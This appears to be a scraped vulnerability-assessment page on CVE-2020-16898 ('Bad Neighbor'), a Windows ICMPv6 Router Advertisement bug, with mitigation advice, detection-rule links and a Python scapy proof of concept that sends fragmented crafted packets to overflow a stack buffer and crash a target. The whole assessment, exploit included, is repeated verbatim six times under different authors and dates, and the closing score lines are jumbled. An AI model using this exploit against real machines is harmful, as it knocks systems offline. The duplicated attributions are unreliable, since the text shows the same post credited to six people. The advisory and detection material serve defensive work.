CVE-2020-16898 aka Bad Neighbor / Ping of Death Redux

A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets, aka ‘Windows TCP/IP Remote Code Execution Vulnerability’.

Recent assessments:

kevthehermit at October 16, 2020 5:29pm UTC reported:

Overview

Crafting IPv6 ICMP Router Advertisement Packets can lead to DOS or potential RCE on vulnerable devices. It is going to be difficult to develop a Full RCE with this exploit. You should of course patch quickly, however you do not need to “panic” when applying patches and mitigations for this across your estate.

The range of Windows Operating Systems impacted by this exploit is smaller than expected as this is a relatively new feature in the code. Server 2019 is not widely used on the open internet so is unlikely to garner much attention and Automatic Security Updates to windows 10 devices should mean that organisations are less vulnerable to this becomes a widespread effective exploit.

Mitigation

Patching is of course the best mitigation.

Disable IPv6 is a mitigation I have seen talked about this is a bad idea if you don’t understand what on your system may already be using it. Instead, disable the specific feature netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable

Detection

Suricata – <https://github.com/advanced-threat-research/CVE-2020-16898&gt;
Snort – <https://www.snort.org/rule_docs/1-55984&gt;
Zeek – <https://github.com/corelight/CVE-2020-16898&gt;

Resources

Microsoft Advisory – <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898&gt;

McAfee have a great writeup that details the vulnerability so I’m not going to repeat that read it from the source :)
<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/&gt;

QuarksLab have also released a detailed blog post explaining how they were able to create a PoC – <https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html&gt;

Context

There are two elements to this vulnerability:

DOS

It is trivial to trigger a crash condition that will lead to BSOD and force a restart of the OS. The POC contains python scapy code that can be used to crash a vulnerable target

RCE

Whilst RCE is technically possible gaining it from this exploit alone is extremely difficult due to the nature of the vuln and the protections in place on modern Windows.

Paired with another vulnerability that can leak additional information in memory it is possible this could lead to RCE and from there to a wormable exploit.

Proof Of Concept

The QuarksLab research includes a Python PoC that is successful at triggering a Crash. The poc is replicated and very slightly modified here.

from scapy.all import *

def trigger(target_addr):
    ip = IPv6(dst = target_addr)
    ra = ICMPv6ND_RA()

    rdnss = ICMPv6NDOptRDNSS(lifetime=900, dns=["3030:3030:3030:3030:3030:3030:3030:3030",
            "3131:3131:3131:3131:3131:3131:3131:3131"])
    # We put an even value for the option length (original length was 5)
    rdnss.len = len(rdnss.dns) * 2
    truncated = bytes(rdnss)[: (rdnss.len-1) * 8]

    # The last 8 bytes of the crafted RDNSS option are interpreted as the start of a second option
    # We build a Route Information Option here
    # https://tools.ietf.org/html/rfc4191#section-2.3
    # Second byte (0x22) is the Length. This controls the size of the buffer overflow
    # (in this case, 0x22 * 8 == 0x110 bytes will be written to the stack buffer)
    routeinfo = b'\x18\x22\xfd\x81\x00\x00\x03\x84'

    # the value that overwrites the return address is taken from here
    correct = ICMPv6NDOptRDNSS(lifetime=900, dns=["4141:4141:4141:4141:4141:4141:4141:4141",
            "4242:4242:4242:4242:4242:4242:4242:4242"])

    crafted = truncated +  routeinfo

    FH=IPv6ExtHdrFragment()
    ip.hlim = 255
    packet = ip/FH/ra/crafted/correct/correct/correct/correct/correct/correct/correct/correct/correct

    #send(packet)
    #return

    frags=fragment6(packet, 100)
    print("len of packet: %d | number of frags: %d" % (len(packet), len(frags)))
    packet.show()

    for frag in frags:
        send(frag, verbose=False)

target_addr = "fe80::3935:5625:ea02:25c9"
trigger(target_addr)

zeroSteiner at October 27, 2020 7:26pm UTC reported:

Overview

Crafting IPv6 ICMP Router Advertisement Packets can lead to DOS or potential RCE on vulnerable devices. It is going to be difficult to develop a Full RCE with this exploit. You should of course patch quickly, however you do not need to “panic” when applying patches and mitigations for this across your estate.

The range of Windows Operating Systems impacted by this exploit is smaller than expected as this is a relatively new feature in the code. Server 2019 is not widely used on the open internet so is unlikely to garner much attention and Automatic Security Updates to windows 10 devices should mean that organisations are less vulnerable to this becomes a widespread effective exploit.

Mitigation

Patching is of course the best mitigation.

Disable IPv6 is a mitigation I have seen talked about this is a bad idea if you don’t understand what on your system may already be using it. Instead, disable the specific feature netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable

Detection

Suricata – <https://github.com/advanced-threat-research/CVE-2020-16898&gt;
Snort – <https://www.snort.org/rule_docs/1-55984&gt;
Zeek – <https://github.com/corelight/CVE-2020-16898&gt;

Resources

Microsoft Advisory – <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898&gt;

McAfee have a great writeup that details the vulnerability so I’m not going to repeat that read it from the source :)
<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/&gt;

QuarksLab have also released a detailed blog post explaining how they were able to create a PoC – <https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html&gt;

Context

There are two elements to this vulnerability:

DOS

It is trivial to trigger a crash condition that will lead to BSOD and force a restart of the OS. The POC contains python scapy code that can be used to crash a vulnerable target

RCE

Whilst RCE is technically possible gaining it from this exploit alone is extremely difficult due to the nature of the vuln and the protections in place on modern Windows.

Paired with another vulnerability that can leak additional information in memory it is possible this could lead to RCE and from there to a wormable exploit.

Proof Of Concept

The QuarksLab research includes a Python PoC that is successful at triggering a Crash. The poc is replicated and very slightly modified here.

from scapy.all import *

def trigger(target_addr):
    ip = IPv6(dst = target_addr)
    ra = ICMPv6ND_RA()

    rdnss = ICMPv6NDOptRDNSS(lifetime=900, dns=["3030:3030:3030:3030:3030:3030:3030:3030",
            "3131:3131:3131:3131:3131:3131:3131:3131"])
    # We put an even value for the option length (original length was 5)
    rdnss.len = len(rdnss.dns) * 2
    truncated = bytes(rdnss)[: (rdnss.len-1) * 8]

    # The last 8 bytes of the crafted RDNSS option are interpreted as the start of a second option
    # We build a Route Information Option here
    # https://tools.ietf.org/html/rfc4191#section-2.3
    # Second byte (0x22) is the Length. This controls the size of the buffer overflow
    # (in this case, 0x22 * 8 == 0x110 bytes will be written to the stack buffer)
    routeinfo = b'\x18\x22\xfd\x81\x00\x00\x03\x84'

    # the value that overwrites the return address is taken from here
    correct = ICMPv6NDOptRDNSS(lifetime=900, dns=["4141:4141:4141:4141:4141:4141:4141:4141",
            "4242:4242:4242:4242:4242:4242:4242:4242"])

    crafted = truncated +  routeinfo

    FH=IPv6ExtHdrFragment()
    ip.hlim = 255
    packet = ip/FH/ra/crafted/correct/correct/correct/correct/correct/correct/correct/correct/correct

    #send(packet)
    #return

    frags=fragment6(packet, 100)
    print("len of packet: %d | number of frags: %d" % (len(packet), len(frags)))
    packet.show()

    for frag in frags:
        send(frag, verbose=False)

target_addr = "fe80::3935:5625:ea02:25c9"
trigger(target_addr)

cl64rk at October 13, 2020 7:09pm UTC reported:

Overview

Crafting IPv6 ICMP Router Advertisement Packets can lead to DOS or potential RCE on vulnerable devices. It is going to be difficult to develop a Full RCE with this exploit. You should of course patch quickly, however you do not need to “panic” when applying patches and mitigations for this across your estate.

The range of Windows Operating Systems impacted by this exploit is smaller than expected as this is a relatively new feature in the code. Server 2019 is not widely used on the open internet so is unlikely to garner much attention and Automatic Security Updates to windows 10 devices should mean that organisations are less vulnerable to this becomes a widespread effective exploit.

Mitigation

Patching is of course the best mitigation.

Disable IPv6 is a mitigation I have seen talked about this is a bad idea if you don’t understand what on your system may already be using it. Instead, disable the specific feature netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable

Detection

Suricata – <https://github.com/advanced-threat-research/CVE-2020-16898&gt;
Snort – <https://www.snort.org/rule_docs/1-55984&gt;
Zeek – <https://github.com/corelight/CVE-2020-16898&gt;

Resources

Microsoft Advisory – <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898&gt;

McAfee have a great writeup that details the vulnerability so I’m not going to repeat that read it from the source :)
<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/&gt;

QuarksLab have also released a detailed blog post explaining how they were able to create a PoC – <https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html&gt;

Context

There are two elements to this vulnerability:

DOS

It is trivial to trigger a crash condition that will lead to BSOD and force a restart of the OS. The POC contains python scapy code that can be used to crash a vulnerable target

RCE

Whilst RCE is technically possible gaining it from this exploit alone is extremely difficult due to the nature of the vuln and the protections in place on modern Windows.

Paired with another vulnerability that can leak additional information in memory it is possible this could lead to RCE and from there to a wormable exploit.

Proof Of Concept

The QuarksLab research includes a Python PoC that is successful at triggering a Crash. The poc is replicated and very slightly modified here.

from scapy.all import *

def trigger(target_addr):
    ip = IPv6(dst = target_addr)
    ra = ICMPv6ND_RA()

    rdnss = ICMPv6NDOptRDNSS(lifetime=900, dns=["3030:3030:3030:3030:3030:3030:3030:3030",
            "3131:3131:3131:3131:3131:3131:3131:3131"])
    # We put an even value for the option length (original length was 5)
    rdnss.len = len(rdnss.dns) * 2
    truncated = bytes(rdnss)[: (rdnss.len-1) * 8]

    # The last 8 bytes of the crafted RDNSS option are interpreted as the start of a second option
    # We build a Route Information Option here
    # https://tools.ietf.org/html/rfc4191#section-2.3
    # Second byte (0x22) is the Length. This controls the size of the buffer overflow
    # (in this case, 0x22 * 8 == 0x110 bytes will be written to the stack buffer)
    routeinfo = b'\x18\x22\xfd\x81\x00\x00\x03\x84'

    # the value that overwrites the return address is taken from here
    correct = ICMPv6NDOptRDNSS(lifetime=900, dns=["4141:4141:4141:4141:4141:4141:4141:4141",
            "4242:4242:4242:4242:4242:4242:4242:4242"])

    crafted = truncated +  routeinfo

    FH=IPv6ExtHdrFragment()
    ip.hlim = 255
    packet = ip/FH/ra/crafted/correct/correct/correct/correct/correct/correct/correct/correct/correct

    #send(packet)
    #return

    frags=fragment6(packet, 100)
    print("len of packet: %d | number of frags: %d" % (len(packet), len(frags)))
    packet.show()

    for frag in frags:
        send(frag, verbose=False)

target_addr = "fe80::3935:5625:ea02:25c9"
trigger(target_addr)

adenosine-phosphatase at October 15, 2020 1:15pm UTC reported:

Overview

Crafting IPv6 ICMP Router Advertisement Packets can lead to DOS or potential RCE on vulnerable devices. It is going to be difficult to develop a Full RCE with this exploit. You should of course patch quickly, however you do not need to “panic” when applying patches and mitigations for this across your estate.

The range of Windows Operating Systems impacted by this exploit is smaller than expected as this is a relatively new feature in the code. Server 2019 is not widely used on the open internet so is unlikely to garner much attention and Automatic Security Updates to windows 10 devices should mean that organisations are less vulnerable to this becomes a widespread effective exploit.

Mitigation

Patching is of course the best mitigation.

Disable IPv6 is a mitigation I have seen talked about this is a bad idea if you don’t understand what on your system may already be using it. Instead, disable the specific feature netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable

Detection

Suricata – <https://github.com/advanced-threat-research/CVE-2020-16898&gt;
Snort – <https://www.snort.org/rule_docs/1-55984&gt;
Zeek – <https://github.com/corelight/CVE-2020-16898&gt;

Resources

Microsoft Advisory – <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898&gt;

McAfee have a great writeup that details the vulnerability so I’m not going to repeat that read it from the source :)
<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/&gt;

QuarksLab have also released a detailed blog post explaining how they were able to create a PoC – <https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html&gt;

Context

There are two elements to this vulnerability:

DOS

It is trivial to trigger a crash condition that will lead to BSOD and force a restart of the OS. The POC contains python scapy code that can be used to crash a vulnerable target

RCE

Whilst RCE is technically possible gaining it from this exploit alone is extremely difficult due to the nature of the vuln and the protections in place on modern Windows.

Paired with another vulnerability that can leak additional information in memory it is possible this could lead to RCE and from there to a wormable exploit.

Proof Of Concept

The QuarksLab research includes a Python PoC that is successful at triggering a Crash. The poc is replicated and very slightly modified here.

from scapy.all import *

def trigger(target_addr):
    ip = IPv6(dst = target_addr)
    ra = ICMPv6ND_RA()

    rdnss = ICMPv6NDOptRDNSS(lifetime=900, dns=["3030:3030:3030:3030:3030:3030:3030:3030",
            "3131:3131:3131:3131:3131:3131:3131:3131"])
    # We put an even value for the option length (original length was 5)
    rdnss.len = len(rdnss.dns) * 2
    truncated = bytes(rdnss)[: (rdnss.len-1) * 8]

    # The last 8 bytes of the crafted RDNSS option are interpreted as the start of a second option
    # We build a Route Information Option here
    # https://tools.ietf.org/html/rfc4191#section-2.3
    # Second byte (0x22) is the Length. This controls the size of the buffer overflow
    # (in this case, 0x22 * 8 == 0x110 bytes will be written to the stack buffer)
    routeinfo = b'\x18\x22\xfd\x81\x00\x00\x03\x84'

    # the value that overwrites the return address is taken from here
    correct = ICMPv6NDOptRDNSS(lifetime=900, dns=["4141:4141:4141:4141:4141:4141:4141:4141",
            "4242:4242:4242:4242:4242:4242:4242:4242"])

    crafted = truncated +  routeinfo

    FH=IPv6ExtHdrFragment()
    ip.hlim = 255
    packet = ip/FH/ra/crafted/correct/correct/correct/correct/correct/correct/correct/correct/correct

    #send(packet)
    #return

    frags=fragment6(packet, 100)
    print("len of packet: %d | number of frags: %d" % (len(packet), len(frags)))
    packet.show()

    for frag in frags:
        send(frag, verbose=False)

target_addr = "fe80::3935:5625:ea02:25c9"
trigger(target_addr)

gwillcox-r7 at April 23, 2021 8:18pm UTC reported:

Overview

Crafting IPv6 ICMP Router Advertisement Packets can lead to DOS or potential RCE on vulnerable devices. It is going to be difficult to develop a Full RCE with this exploit. You should of course patch quickly, however you do not need to “panic” when applying patches and mitigations for this across your estate.

The range of Windows Operating Systems impacted by this exploit is smaller than expected as this is a relatively new feature in the code. Server 2019 is not widely used on the open internet so is unlikely to garner much attention and Automatic Security Updates to windows 10 devices should mean that organisations are less vulnerable to this becomes a widespread effective exploit.

Mitigation

Patching is of course the best mitigation.

Disable IPv6 is a mitigation I have seen talked about this is a bad idea if you don’t understand what on your system may already be using it. Instead, disable the specific feature netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable

Detection

Suricata – <https://github.com/advanced-threat-research/CVE-2020-16898&gt;
Snort – <https://www.snort.org/rule_docs/1-55984&gt;
Zeek – <https://github.com/corelight/CVE-2020-16898&gt;

Resources

Microsoft Advisory – <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898&gt;

McAfee have a great writeup that details the vulnerability so I’m not going to repeat that read it from the source :)
<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/&gt;

QuarksLab have also released a detailed blog post explaining how they were able to create a PoC – <https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html&gt;

Context

There are two elements to this vulnerability:

DOS

It is trivial to trigger a crash condition that will lead to BSOD and force a restart of the OS. The POC contains python scapy code that can be used to crash a vulnerable target

RCE

Whilst RCE is technically possible gaining it from this exploit alone is extremely difficult due to the nature of the vuln and the protections in place on modern Windows.

Paired with another vulnerability that can leak additional information in memory it is possible this could lead to RCE and from there to a wormable exploit.

Proof Of Concept

The QuarksLab research includes a Python PoC that is successful at triggering a Crash. The poc is replicated and very slightly modified here.

from scapy.all import *

def trigger(target_addr):
    ip = IPv6(dst = target_addr)
    ra = ICMPv6ND_RA()

    rdnss = ICMPv6NDOptRDNSS(lifetime=900, dns=["3030:3030:3030:3030:3030:3030:3030:3030",
            "3131:3131:3131:3131:3131:3131:3131:3131"])
    # We put an even value for the option length (original length was 5)
    rdnss.len = len(rdnss.dns) * 2
    truncated = bytes(rdnss)[: (rdnss.len-1) * 8]

    # The last 8 bytes of the crafted RDNSS option are interpreted as the start of a second option
    # We build a Route Information Option here
    # https://tools.ietf.org/html/rfc4191#section-2.3
    # Second byte (0x22) is the Length. This controls the size of the buffer overflow
    # (in this case, 0x22 * 8 == 0x110 bytes will be written to the stack buffer)
    routeinfo = b'\x18\x22\xfd\x81\x00\x00\x03\x84'

    # the value that overwrites the return address is taken from here
    correct = ICMPv6NDOptRDNSS(lifetime=900, dns=["4141:4141:4141:4141:4141:4141:4141:4141",
            "4242:4242:4242:4242:4242:4242:4242:4242"])

    crafted = truncated +  routeinfo

    FH=IPv6ExtHdrFragment()
    ip.hlim = 255
    packet = ip/FH/ra/crafted/correct/correct/correct/correct/correct/correct/correct/correct/correct

    #send(packet)
    #return

    frags=fragment6(packet, 100)
    print("len of packet: %d | number of frags: %d" % (len(packet), len(frags)))
    packet.show()

    for frag in frags:
        send(frag, verbose=False)

target_addr = "fe80::3935:5625:ea02:25c9"
trigger(target_addr)

ccondon-r7 at December 28, 2020 11:18pm UTC reported:

Overview

Crafting IPv6 ICMP Router Advertisement Packets can lead to DOS or potential RCE on vulnerable devices. It is going to be difficult to develop a Full RCE with this exploit. You should of course patch quickly, however you do not need to “panic” when applying patches and mitigations for this across your estate.

The range of Windows Operating Systems impacted by this exploit is smaller than expected as this is a relatively new feature in the code. Server 2019 is not widely used on the open internet so is unlikely to garner much attention and Automatic Security Updates to windows 10 devices should mean that organisations are less vulnerable to this becomes a widespread effective exploit.

Mitigation

Patching is of course the best mitigation.

Disable IPv6 is a mitigation I have seen talked about this is a bad idea if you don’t understand what on your system may already be using it. Instead, disable the specific feature netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable

Detection

Suricata – <https://github.com/advanced-threat-research/CVE-2020-16898&gt;
Snort – <https://www.snort.org/rule_docs/1-55984&gt;
Zeek – <https://github.com/corelight/CVE-2020-16898&gt;

Resources

Microsoft Advisory – <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898&gt;

McAfee have a great writeup that details the vulnerability so I’m not going to repeat that read it from the source :)
<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/&gt;

QuarksLab have also released a detailed blog post explaining how they were able to create a PoC – <https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html&gt;

Context

There are two elements to this vulnerability:

DOS

It is trivial to trigger a crash condition that will lead to BSOD and force a restart of the OS. The POC contains python scapy code that can be used to crash a vulnerable target

RCE

Whilst RCE is technically possible gaining it from this exploit alone is extremely difficult due to the nature of the vuln and the protections in place on modern Windows.

Paired with another vulnerability that can leak additional information in memory it is possible this could lead to RCE and from there to a wormable exploit.

Proof Of Concept

The QuarksLab research includes a Python PoC that is successful at triggering a Crash. The poc is replicated and very slightly modified here.

from scapy.all import *

def trigger(target_addr):
    ip = IPv6(dst = target_addr)
    ra = ICMPv6ND_RA()

    rdnss = ICMPv6NDOptRDNSS(lifetime=900, dns=["3030:3030:3030:3030:3030:3030:3030:3030",
            "3131:3131:3131:3131:3131:3131:3131:3131"])
    # We put an even value for the option length (original length was 5)
    rdnss.len = len(rdnss.dns) * 2
    truncated = bytes(rdnss)[: (rdnss.len-1) * 8]

    # The last 8 bytes of the crafted RDNSS option are interpreted as the start of a second option
    # We build a Route Information Option here
    # https://tools.ietf.org/html/rfc4191#section-2.3
    # Second byte (0x22) is the Length. This controls the size of the buffer overflow
    # (in this case, 0x22 * 8 == 0x110 bytes will be written to the stack buffer)
    routeinfo = b'\x18\x22\xfd\x81\x00\x00\x03\x84'

    # the value that overwrites the return address is taken from here
    correct = ICMPv6NDOptRDNSS(lifetime=900, dns=["4141:4141:4141:4141:4141:4141:4141:4141",
            "4242:4242:4242:4242:4242:4242:4242:4242"])

    crafted = truncated +  routeinfo

    FH=IPv6ExtHdrFragment()
    ip.hlim = 255
    packet = ip/FH/ra/crafted/correct/correct/correct/correct/correct/correct/correct/correct/correct

    #send(packet)
    #return

    frags=fragment6(packet, 100)
    print("len of packet: %d | number of frags: %d" % (len(packet), len(frags)))
    packet.show()

    for frag in frags:
        send(frag, verbose=False)

target_addr = "fe80::3935:5625:ea02:25c9"
trigger(target_addr)

Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 2